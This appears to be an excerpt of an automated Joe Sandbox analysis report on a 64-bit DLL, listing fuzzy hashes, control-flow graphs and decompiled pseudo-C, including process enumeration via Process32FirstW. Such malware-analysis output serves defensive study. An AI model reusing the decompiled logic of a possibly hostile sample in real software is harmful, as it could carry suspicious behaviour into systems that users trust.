                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @_$Q+$w$+$3C$u
                                                                                                        • API String ID: 0-4152583413
                                                                                                        • Opcode ID: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
                                                                                                        • Instruction ID: b6ea412dc30f19c74fb4b1663690e8dc750e0b49b1240d0c045de5a6b9424b82
                                                                                                        • Opcode Fuzzy Hash: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
                                                                                                        • Instruction Fuzzy Hash: 7D02F67151038DEFDB98DF24C889ADD3BA1FB58398F952219FC0A972A0C774D985CB84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 3m$SW$rS$r$t.?8
                                                                                                        • API String ID: 0-4220278859
                                                                                                        • Opcode ID: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
                                                                                                        • Instruction ID: 5729ab1ff226baa14ab4ffc9551888db56205bfd96deea9119b6bbc9091883bb
                                                                                                        • Opcode Fuzzy Hash: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
                                                                                                        • Instruction Fuzzy Hash: F2C1EF7151A784ABD388DF28C5CA95BBBE1FBC4744F906A1DF496862A0D7B4D908CF02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 572 180005db4-180005e1d call 180011408 575 180005e22-180005e27 572->575 576 1800060e2-1800060f3 call 18000bf58 575->576 577 180005e2d-180005e32 575->577 588 1800060f5-1800060fa 576->588 589 1800060ff 576->589 579 180006063-1800060d8 call 18001b204 577->579 580 180005e38-180005e3d 577->580 585 1800060dd Process32FirstW 579->585 581 180005e43-180005e48 580->581 582 180005f89-180006047 call 180005be0 580->582 586 180005ef5-180005f74 call 18001b898 581->586 587 180005e4e-180005e53 581->587 595 18000604c-180006053 582->595 585->576 599 180005f79-180005f84 586->599 591 180005ee6-180005ef0 587->591 592 180005e59-180005e5b 587->592 588->575 593 180006101-180006106 589->593 591->575 592->593 596 180005e61-180005ec8 call 18000fe88 592->596 597 18000610c 593->597 598 180005ecd-180005ee5 593->598 595->598 600 180006059-18000605e 595->600 596->598 597->575 599->575 600->575
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 9$>$Qz$cG$iP.
                                                                                                        • API String ID: 0-2314038544
                                                                                                        • Opcode ID: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
                                                                                                        • Instruction ID: 2738067ee2515d3e4966bb770307c21824dc71e1dd538b0d2de93925eb972619
                                                                                                        • Opcode Fuzzy Hash: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
                                                                                                        • Instruction Fuzzy Hash: 57815D701497888BEBE8DF24C8C5BDA7BE1FB88344F50551DF88A8B290CB75DA44CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 635 1800248e0-1800248fd 636 180024904-180024909 635->636 637 1800250f3-1800250f8 636->637 638 18002490f 636->638 639 1800254ca-180025622 call 18002629c call 1800210bc call 180002094 637->639 640 1800250fe-180025103 637->640 641 180024f62-18002502d call 180001000 call 1800210bc 638->641 642 180024915-18002491a 638->642 658 180025627-18002562c 639->658 643 180025459-1800254c5 call 180009144 640->643 644 180025109-18002510e 640->644 677 180025032-1800250ee call 180002094 641->677 646 180024920-180024925 642->646 647 180024dce-180024eb5 call 180014fa4 call 1800210bc 642->647 643->636 650 180025114-180025119 644->650 651 1800252ad-180025379 call 18001cf30 call 1800210bc 644->651 654 180024c3b-180024d15 call 1800159a0 call 1800210bc 646->654 655 18002492b-180024930 646->655 679 180024eba-180024f5d call 180002094 647->679 650->658 659 18002511f-1800251ec call 18000b8d0 call 1800210bc 650->659 692 18002537e-180025454 call 180002094 651->692 693 180024d1a-180024dc9 call 180002094 654->693 662 180024ab3-180024b9b call 18001c1dc call 1800210bc 655->662 663 180024936-18002493b 655->663 673 180025632 658->673 674 1800257ad-1800257b3 658->674 697 1800251f1-1800252a8 call 180002094 659->697 699 180024ba0-180024c36 call 180002094 662->699 671 180024941-180024946 663->671 672 180025637-180025720 call 180008fa0 call 1800210bc 663->672 671->658 682 18002494c-180024aae call 180004ca0 call 1800210bc call 180002094 671->682 705 180025725-1800257a8 call 180002094 672->705 673->636 677->636 679->636 682->636 692->636 693->636 697->636 699->636 705->674
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Rl$X$kr$V%?
                                                                                                        • API String ID: 0-1881522904
                                                                                                        • Opcode ID: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
                                                                                                        • Instruction ID: 70c5aac2912e64376728126259cd49d2f789cf9a10fb17a3f2cb6be72cb14558
                                                                                                        • Opcode Fuzzy Hash: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
                                                                                                        • Instruction Fuzzy Hash: 59A2077051078D8FDB89CF24C88A5DE3BA0FB58398F52531DFC8AA6290D778D595CB88
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 715 1800038a5-1800038ad 716 1800038f3-1800038fb 715->716 717 1800038af-1800038d9 call 180015254 715->717 719 180003902-180003907 716->719 721 180003b71-180003bc4 call 180009144 719->721 722 18000390d-180003912 719->722 732 180003bc6-180003bcb 721->732 733 180003bd0 721->733 724 180003b01-180003b6c call 18001b7b0 722->724 725 180003918-18000391d 722->725 724->719 728 180003923-180003928 725->728 729 180003a56-180003afc call 180020364 725->729 734 180003bd5-180003bda 728->734 735 18000392e-1800039e8 call 180016fb4 728->735 729->719 732->719 733->734 738 180003a43-180003a55 734->738 739 180003be0 734->739 740 1800039ed-1800039f0 735->740 739->719 741 1800039f2-1800039f9 740->741 742 180003a03-180003a3e call 18001c4c0 740->742 741->742 742->738
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: +s$l@-T$pN$x+MS
                                                                                                        • API String ID: 0-3074933293
                                                                                                        • Opcode ID: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
                                                                                                        • Instruction ID: e901c82c2c3415e94c79d9569d7d5064836046090d2f5b38374df02bf067750a
                                                                                                        • Opcode Fuzzy Hash: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
                                                                                                        • Instruction Fuzzy Hash: A991597160074D8BEB59CF28C89A6DE3BA1FB58398F51422CFC4A97290CB78D655CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: \$m[+$m)7
                                                                                                        • API String ID: 0-1435720626
                                                                                                        • Opcode ID: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
                                                                                                        • Instruction ID: 883ce2ee539239a1f536d03f946b290b5c9bffedac0f26b385fd5492cb17272a
                                                                                                        • Opcode Fuzzy Hash: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
                                                                                                        • Instruction Fuzzy Hash: C002F6715083C88BEBFADF64C8897DE7BACFB54708F104619EA0A9E298DB745744CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x+MS$8
                                                                                                        • API String ID: 0-2879286383
                                                                                                        • Opcode ID: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
                                                                                                        • Instruction ID: 069f65542df350c22b25c5b11342d601f1728201a4aced1865a094658918a1cd
                                                                                                        • Opcode Fuzzy Hash: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
                                                                                                        • Instruction Fuzzy Hash: 42413B7050074D8BEB49CF28C88A6DE3FA1FB18398F61421DFD4A96290D778D598CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: '7$pr
                                                                                                        • API String ID: 0-1984906187
                                                                                                        • Opcode ID: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
                                                                                                        • Instruction ID: a51af08d5e019336a09e0604cbee0951de86a06f6bb7dc6101bcf2cec172da0b
                                                                                                        • Opcode Fuzzy Hash: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
                                                                                                        • Instruction Fuzzy Hash: A031C2B05187818BD358CFA8C48A51AFBF5BBC6344F104A1DF9C2866A0D7F5D946CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {6
                                                                                                        • API String ID: 0-1346941803
                                                                                                        • Opcode ID: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
                                                                                                        • Instruction ID: 4f9844d0cd30e9af067f9ce6bd73810c55f6bc83b648b6efbf776691940ba2a0
                                                                                                        • Opcode Fuzzy Hash: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
                                                                                                        • Instruction Fuzzy Hash: FA8126B09047098BDF48DFA8C4865EEBBF0FB48358F15821DE80AB7291D7789945CF98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1
                                                                                                        • API String ID: 0-4267224553
                                                                                                        • Opcode ID: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
                                                                                                        • Instruction ID: f864b420d3f879fa0c4a6b1c1884d968131e299f1c3c71a38cb5ded6753929e5
                                                                                                        • Opcode Fuzzy Hash: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
                                                                                                        • Instruction Fuzzy Hash: 4881FE705087848FD779DF28C59A6DEBBF1FB89704F004A1DEA8A8B260D7769905CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 311 7ffc28904194-7ffc2890419a 312 7ffc289041d5-7ffc2890432c 311->312 313 7ffc2890419c-7ffc2890419f 311->313 317 7ffc28904332-7ffc2890434d call 7ffc28903da8 312->317 318 7ffc2890432e-7ffc28904330 312->318 315 7ffc289041c9-7ffc28904208 call 7ffc28903f18 313->315 316 7ffc289041a1-7ffc289041a4 313->316 334 7ffc2890420a-7ffc2890420c 315->334 335 7ffc28904211-7ffc28904226 call 7ffc28903da8 315->335 320 7ffc289041a6-7ffc289041a9 316->320 321 7ffc289041bc __scrt_dllmain_crt_thread_attach 316->321 332 7ffc28904359-7ffc28904380 call 7ffc28903ed4 call 7ffc28903f04 call 7ffc289040cc call 7ffc289040f0 317->332 333 7ffc2890434f-7ffc28904354 call 7ffc28904944 317->333 325 7ffc28904382-7ffc28904391 318->325 322 7ffc289041ab-7ffc289041b4 320->322 323 7ffc289041b5-7ffc289041ba call 7ffc28903e58 320->323 324 7ffc289041c1-7ffc289041c8 321->324 323->324 332->325 333->332 338 7ffc289042f9-7ffc2890430e 334->338 343 7ffc28904228-7ffc2890422d call 7ffc28904944 335->343 344 7ffc28904232-7ffc28904243 call 7ffc28903e18 335->344 343->344 351 7ffc28904245-7ffc2890427a call 7ffc28904b90 call 7ffc2890416c call 7ffc28904b40 call 7ffc2890416c call 7ffc28904b6c call 7ffc2890a908 344->351 352 7ffc289042ac-7ffc289042b6 call 7ffc289040cc 344->352 378 7ffc2890427f-7ffc28904281 351->378 352->334 360 7ffc289042bc-7ffc289042c8 call 7ffc28904b88 352->360 366 7ffc289042ca-7ffc289042d4 call 7ffc28904030 360->366 367 7ffc289042ee-7ffc289042f4 360->367 366->367 373 7ffc289042d6-7ffc289042e9 call 7ffc28904a8c 366->373 367->338 373->367 378->352 379 7ffc28904283-7ffc2890428a __scrt_dllmain_after_initialize_c 378->379 379->352 380 7ffc2890428c-7ffc289042a9 call 7ffc2890a8c4 379->380 380->352
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC28904194(void* __edx) {
                                                                                                        				void* _t5;
                                                                                                        
                                                                                                        				_t5 = __edx;
                                                                                                        				if (_t5 == 0) goto 0x289041d5;
                                                                                                        				if (_t5 == 0) goto 0x289041c9;
                                                                                                        				if (_t5 == 0) goto 0x289041bc;
                                                                                                        				if (__edx == 1) goto 0x289041b5;
                                                                                                        				return 1;
                                                                                                        			}




                                                                                                        0x7ffc28904198
                                                                                                        0x7ffc2890419a
                                                                                                        0x7ffc2890419f
                                                                                                        0x7ffc289041a4
                                                                                                        0x7ffc289041a9
                                                                                                        0x7ffc289041b4

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3885183344-0
                                                                                                        • Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                        • Instruction ID: 30c63b6c74b8b070ad72e6e7c8f9ed11ef61b8ef137c02565fa8d872e4a67c64
                                                                                                        • Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                        • Instruction Fuzzy Hash: C151C221F0C66B85FA50B765AC413B92290EF9634BF488037E90D576D7CE2EE445C778
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC28901580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
                                                                                                        				char _v16;
                                                                                                        				char _v24;
                                                                                                        				long long _v32;
                                                                                                        				void* _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				void* _t41;
                                                                                                        				intOrPtr* _t49;
                                                                                                        				void* _t77;
                                                                                                        
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v32 = 0xfffffffe;
                                                                                                        				_t49 = _a16;
                                                                                                        				if (_a8 == _t49) goto 0x28901693;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC28901910(1, _t49, _a8, _t77); // executed
                                                                                                        				if (0 == 1) goto 0x2890160a;
                                                                                                        				E00007FFC7FFC28901850(_a16);
                                                                                                        				_v56 = _t49;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				if ((E00007FFC7FFC28902A50(_t49, _v56) & 0x000000ff) == 0) goto 0x2890160a;
                                                                                                        				E00007FFC7FFC28901850(_a16);
                                                                                                        				E00007FFC7FFC28901870(_t49, _a8, _t49);
                                                                                                        				E00007FFC7FFC28901850(_a16);
                                                                                                        				_v48 = _t49;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				if ((E00007FFC7FFC28902A50(_t49, _v48) & 0x000000ff) == 0) goto 0x2890167a;
                                                                                                        				E00007FFC7FFC28901A20(_t49, _a16,  &_v24);
                                                                                                        				_v40 = _t49;
                                                                                                        				E00007FFC7FFC28901AA0(_t49, _a16,  &_v16);
                                                                                                        				_t41 = E00007FFC7FFC28902A90(E00007FFC7FFC28902A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
                                                                                                        				goto 0x28901693;
                                                                                                        				E00007FFC7FFC28902B00(_t41, _a16);
                                                                                                        				return E00007FFC7FFC28901F00(_t49, _a8, _t49);
                                                                                                        			}












                                                                                                        0x7ffc28901580
                                                                                                        0x7ffc28901585
                                                                                                        0x7ffc2890158e
                                                                                                        0x7ffc28901597
                                                                                                        0x7ffc289015a1
                                                                                                        0x7ffc289015a7
                                                                                                        0x7ffc289015b1
                                                                                                        0x7ffc289015bc
                                                                                                        0x7ffc289015c3
                                                                                                        0x7ffc289015c9
                                                                                                        0x7ffc289015d3
                                                                                                        0x7ffc289015ef
                                                                                                        0x7ffc289015f6
                                                                                                        0x7ffc28901604
                                                                                                        0x7ffc2890160f
                                                                                                        0x7ffc28901615
                                                                                                        0x7ffc2890161f
                                                                                                        0x7ffc2890163b
                                                                                                        0x7ffc28901647
                                                                                                        0x7ffc2890164d
                                                                                                        0x7ffc2890165c
                                                                                                        0x7ffc28901672
                                                                                                        0x7ffc28901678
                                                                                                        0x7ffc2890167f
                                                                                                        0x7ffc2890169c

                                                                                                        APIs
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289015C3
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289015D3
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289015F6
                                                                                                          • Part of subcall function 00007FFC28901870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC28901883
                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFC289015E4
                                                                                                          • Part of subcall function 00007FFC28902A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFC28902A68
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890160F
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC2890161F
                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFC28901630
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 1937815552-0
                                                                                                        • Opcode ID: dc6ab4d9f45e2fc801d73a2ffc5ed4d45eff3d4dab762b5c041e478808ec6813
                                                                                                        • Instruction ID: f34889788a7257e15179163aa178f76ae4600117aeb1035697b0cf7151657706
                                                                                                        • Opcode Fuzzy Hash: dc6ab4d9f45e2fc801d73a2ffc5ed4d45eff3d4dab762b5c041e478808ec6813
                                                                                                        • Instruction Fuzzy Hash: D6310D31A5DA5981DA11FB22EC5157B63A1FBC57C1F001536FA8D837EACE2DE440CB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC28902600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _v80;
                                                                                                        				long long _v88;
                                                                                                        				long long _v96;
                                                                                                        				long long _v104;
                                                                                                        				char _v112;
                                                                                                        				signed long long _v120;
                                                                                                        				void* _t82;
                                                                                                        				signed long long _t111;
                                                                                                        				intOrPtr* _t113;
                                                                                                        				intOrPtr* _t114;
                                                                                                        				long long _t115;
                                                                                                        				intOrPtr* _t116;
                                                                                                        				intOrPtr* _t117;
                                                                                                        				signed long long _t118;
                                                                                                        				long long _t120;
                                                                                                        				long long* _t121;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0xfffffffe;
                                                                                                        				_t111 = _a16 | 0x0000000f;
                                                                                                        				_v120 = _t111;
                                                                                                        				E00007FFC7FFC28902830(_t111, _a8);
                                                                                                        				if (_t111 - _v120 >= 0) goto 0x28902659;
                                                                                                        				_v120 = _a16;
                                                                                                        				goto 0x28902736;
                                                                                                        				_t113 = _v120;
                                                                                                        				_v104 = _t113;
                                                                                                        				E00007FFC7FFC28902150(_t113, _a8);
                                                                                                        				_t114 =  *_t113;
                                                                                                        				if (_t114 - _v104 > 0) goto 0x28902696;
                                                                                                        				goto 0x28902736;
                                                                                                        				E00007FFC7FFC28902150(_t114, _a8);
                                                                                                        				_t115 =  *_t114;
                                                                                                        				_v96 = _t115;
                                                                                                        				E00007FFC7FFC28902830(_t115, _a8);
                                                                                                        				_t116 = _t115 - _v96;
                                                                                                        				_v88 = _t116;
                                                                                                        				E00007FFC7FFC28902150(_t116, _a8);
                                                                                                        				if ( *_t116 - _v88 > 0) goto 0x28902724;
                                                                                                        				E00007FFC7FFC28902150(_t116, _a8);
                                                                                                        				_t117 =  *_t116;
                                                                                                        				_v80 = _t117;
                                                                                                        				E00007FFC7FFC28902150(_t117, _a8);
                                                                                                        				_t118 = _v80 +  *_t117;
                                                                                                        				_v120 = _t118;
                                                                                                        				goto 0x28902736;
                                                                                                        				E00007FFC7FFC28902830(_t118, _a8);
                                                                                                        				_v120 = _t118;
                                                                                                        				_t120 = _v120 + 1;
                                                                                                        				_v72 = _t120;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				E00007FFC7FFC289028E0(_t120, _v72); // executed
                                                                                                        				_v64 = _t120;
                                                                                                        				_t121 = _v64;
                                                                                                        				_v112 = _t121;
                                                                                                        				goto 0x28902771;
                                                                                                        				if (_a24 <= 0) goto 0x289027b0;
                                                                                                        				_t82 = E00007FFC7FFC289018F0(_t121, _a8);
                                                                                                        				_v40 = _t121;
                                                                                                        				E00007FFC7FFC28902C00(_t82, _v112);
                                                                                                        				E00007FFC7FFC289011E0(_t121, _v40, _a24);
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC28901910(1, _t121, _a8, _a24);
                                                                                                        				E00007FFC7FFC28902BC0(E00007FFC7FFC28902190(_a8), _t121);
                                                                                                        				_v32 = _t121;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				E00007FFC7FFC28902C10(_t121, _t121, _v32,  &_v112);
                                                                                                        				E00007FFC7FFC28902150(_t121, _a8);
                                                                                                        				 *_t121 = _v120;
                                                                                                        				return E00007FFC7FFC289023A0(_t121, _a8, _a24);
                                                                                                        			}
























                                                                                                        0x7ffc28902600
                                                                                                        0x7ffc28902605
                                                                                                        0x7ffc2890260a
                                                                                                        0x7ffc28902616
                                                                                                        0x7ffc2890262a
                                                                                                        0x7ffc2890262e
                                                                                                        0x7ffc2890263b
                                                                                                        0x7ffc28902645
                                                                                                        0x7ffc2890264f
                                                                                                        0x7ffc28902654
                                                                                                        0x7ffc2890265b
                                                                                                        0x7ffc28902668
                                                                                                        0x7ffc28902675
                                                                                                        0x7ffc2890267c
                                                                                                        0x7ffc2890268f
                                                                                                        0x7ffc28902691
                                                                                                        0x7ffc2890269e
                                                                                                        0x7ffc289026a5
                                                                                                        0x7ffc289026b0
                                                                                                        0x7ffc289026bd
                                                                                                        0x7ffc289026c7
                                                                                                        0x7ffc289026ca
                                                                                                        0x7ffc289026d7
                                                                                                        0x7ffc289026e4
                                                                                                        0x7ffc289026ee
                                                                                                        0x7ffc289026f5
                                                                                                        0x7ffc28902700
                                                                                                        0x7ffc2890270d
                                                                                                        0x7ffc2890271a
                                                                                                        0x7ffc2890271d
                                                                                                        0x7ffc28902722
                                                                                                        0x7ffc2890272c
                                                                                                        0x7ffc28902731
                                                                                                        0x7ffc2890273b
                                                                                                        0x7ffc2890273e
                                                                                                        0x7ffc2890274b
                                                                                                        0x7ffc2890275b
                                                                                                        0x7ffc28902760
                                                                                                        0x7ffc28902765
                                                                                                        0x7ffc2890276a
                                                                                                        0x7ffc2890276f
                                                                                                        0x7ffc2890277a
                                                                                                        0x7ffc28902784
                                                                                                        0x7ffc28902789
                                                                                                        0x7ffc28902793
                                                                                                        0x7ffc289027ab
                                                                                                        0x7ffc289027b0
                                                                                                        0x7ffc289027bd
                                                                                                        0x7ffc289027d2
                                                                                                        0x7ffc289027d7
                                                                                                        0x7ffc289027e4
